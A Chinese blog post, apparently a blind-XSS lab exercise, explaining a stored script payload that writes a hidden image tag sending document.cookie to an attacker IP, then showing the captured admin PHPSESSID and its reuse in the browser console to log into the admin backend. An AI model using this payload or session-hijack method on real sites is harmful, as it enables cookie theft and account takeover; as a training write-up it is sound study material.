XSS 盲打【练习】

已于 2023-11-20 21:11:00 修改
阅读量29 收藏
点赞数
分类专栏: 练习 文章标签: xss 前端
于 2023-11-15 15:53:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51494407/article/details/134422227
版权

写入 xss 代码

这段代码是一个 JavaScript 脚本,它包含在 <script> 标签中。让我们逐行解释这段代码的含义:

  1. <script>: 这是 HTML 中用于包含 JavaScript 代码的标签。

  2. document.write(...): 这是一个 JavaScript 方法,用于将指定的内容写入到文档中。在这段代码中,它将会写入一段 HTML 代码。

  3. <img src="http://10.9.47.64/'+document.cookie+'" width=0 height=0 border=0/>: 这是一个 <img> 标签,用于在网页中显示图像。src 属性指定了图像的 URL,它的值是一个字符串拼接操作。在这里,http://10.9.47.64/ 是图像的 URL 的基础部分,而 document.cookie 是 JavaScript 的一个内置属性,用于获取当前网页的 Cookie。通过将这两部分拼接起来,将会生成一个完整的图像 URL。

整体来说,这段代码的目的是将当前网页的 Cookie 发送到 http://10.9.47.64/

<script>document.write(\'<img src=\"http://10.9.47.64/\'+document.cookie+\'\"width=0 height=0 border=0/>\')\;</script>

image-20231109152638407

image-20231109152836315

攻击机开启端口监听等待

image-20231109153042899

等待管理员访问后台后,获得 cookie 信息

"GET /username=admin;%20userid=1;%20PHPSESSID=7ambb6qqaovrkud61e98ldb6m4 HTTP/1.1" 404 -

document.cookie = “username=admin”

document.cookie = “userid=1”

document.cookie = “PHPSESSID=7ambb6qqaovrkud61e98ldb6m4”

image-20231109155600096

控制台输入,直接登录后台

image-20231109160211777

image-20231109160235973

image-20231109160251201

wuuuenoi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS盲打练习(简单认识反射型、存储型XSS和cookie欺骗)
m0_56578216的博客
08-25 476
如果存在漏洞,这段代码会被页面的JS解释器编译并执行,点击搜索。
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战篇
m0_67844671的博客
10-05 3969
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
XSS盲打
Naive_boy00的博客
10-15 2618
XSS的查找:绕过过滤机制,利用服务端错误的编码方式例:url:http//www.foo.com/xss.php?id=1HTML标签之间<div>[输出]</div> //xsspayload:<script>alert(1)</script>标签之间无法执行脚本,要先闭合掉对应的标签。此类标签有:<title></title> <textarea></textarea> <xmp></xmp>
渗透测试-xss钓鱼测试和xss盲打
lza20001103的博客
04-24 2355
渗透测试-xss钓鱼测试和xss盲打
xss平台搭建源码,xss漏洞练习
06-03
二、搭建XSS练习平台 1. 解压:首先,你需要下载提供的压缩包,并将其解压缩到Web服务器的根目录,通常为`www`或`htdocs`目录。 2. 数据库准备:使用MySQL等数据库管理系统,创建一个名为`xss-sql`的数据库。这通常...
XSS练习平台
07-17
XSS练习平台是一个用于学习和提升XSS防护技能的在线环境,提供了各种模拟的XSS漏洞场景,帮助用户理解其工作原理并掌握防范方法。 首先,我们要理解XSS漏洞的分类。XSS分为三种类型:反射型XSS、存储型XSS和DOM型...
XSS20关练习源码
09-04
通过逐个解决这些练习,学习者将深入理解XSS的工作原理,掌握如何检测和修复这类漏洞。使用PHPStudy这样的本地开发环境,可以方便地运行和调试这些示例,增强实战经验。 总的来说,这个资源为想要提升Web安全技能的...
xss_test.7z
03-12
"xss_test.7z"这个压缩包文件,显然包含了用于XSS攻防练习的相关材料,这对于我们深入理解和防范XSS攻击至关重要。 首先,理解XSS的基本类型: 1. **存储型XSS**:这种类型的XSS攻击发生在用户提交的数据被存储到...
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
记一次因敏感信息泄露而导致的越权+存储型XSS
2301_80127209的博客
07-23 608
可能各位师傅会有苦于不知道如何寻找测试目标的烦恼,这里我惯用的就是寻找可进站的思路。这个思路分为两种,一是弱口令进站测试,二是可注册进站测试。依照这个思路,我依旧是用鹰图进行了一波资产的搜集。
反射型与dom型的xss的区别【源码分析】
2301_80064376的博客
07-26 2080
攻击点反射型 XSS:恶意代码通过 HTTP 请求发送到服务器,并在服务器响应中反射回客户端。DOM 型 XSS:恶意代码直接在客户端(浏览器)中通过 JavaScript 动态生成和执行。执行位置反射型 XSS:服务器响应时执行。DOM 型 XSS:客户端 JavaScript 处理时执行。防御重点反射型 XSS:服务器端的输入验证和输出编码。DOM 型 XSS:客户端 JavaScript 的输入验证和安全的 DOM 操作。
【分享】前端程序员-技术网站推荐
一位前行者的博客
07-30 419
对于前端开发人员来说,以下是一些推荐的技术网站,这些网站提供了丰富的资源和知识,可以帮助你提升前端开发技能:收集一些 、、 的网站 vite 官方中文文档 element-plus 官方中文文档 pinia 官方中文文档 vue-router 官方中文文档 Tailwind CSS 官方文档 vitest 官方中文文档 es6 中文文档 axios 官方中文文档 vxetable 官方中文文档 lodash 中文文档 echarts 官方中文文档 animat
js、ts、argular、nodejs学习心得
最新发布
07-30 202
工作中需要前端argular开发桌面程序,后端用nodejs开发服务器,商用软件架构。
苍穹外卖浏览器前端界面修改
程序员象漂亮的博客
07-25 275
客户原始方案是期望做一个Spring Boot + Vue的饿了么系统,但时间上太仓促,所以建议选择开源的苍穹外码目作为作业提交。客户接受了建议的方案后,期望对前端页面提出了一些个性化的定制修改。
electron 主进程和渲染进程
qq_21087199的博客
07-29 274
虽然最近一年前端大环境不好,但是大家还是要加油鸭!,努力总不会错,千军万马过独木桥,希望大家都是闯过去那一个。进入正题。
基于上云api前端开发经验教训(loading...)
IIIIIAN
07-26 440
对于上云api开发学习过程中的错误教训积累总结
我们的前端开发逆天了!1 小时搞定了新网站,还跟我说 “不要钱”
努力做最接地气的编程干货分享,感谢关注
07-29 1301
本文将带你了解一个新的 Web 框架 **Astro**,并手把手带你使用 Astro 搭建一个属于自己的站点,用过的都说真香!
前端 axios 封装
清云
07-29 447
前端 axios 封装
写一个python脚本检测pikachu靶场的xss盲打
06-03
好的,下面是一个简单的 Python 脚本,用于检测 pikachu 靶场的 XSS 盲打漏洞。 ```python import requests # 构造请求 url = "http://your-pikachu-url.com/vulnerabilities/xss_s/" payload = "<script>alert('...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值